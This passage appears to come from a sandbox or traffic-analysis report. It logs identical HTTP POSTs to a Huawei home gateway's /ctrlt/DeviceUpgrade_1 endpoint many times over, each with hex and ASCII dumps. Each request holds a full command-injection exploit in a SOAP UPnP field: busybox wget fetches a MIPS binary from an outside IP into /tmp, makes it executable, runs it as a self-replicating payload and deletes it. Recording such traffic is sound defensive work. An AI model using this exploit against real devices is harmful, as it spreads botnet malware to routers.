3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
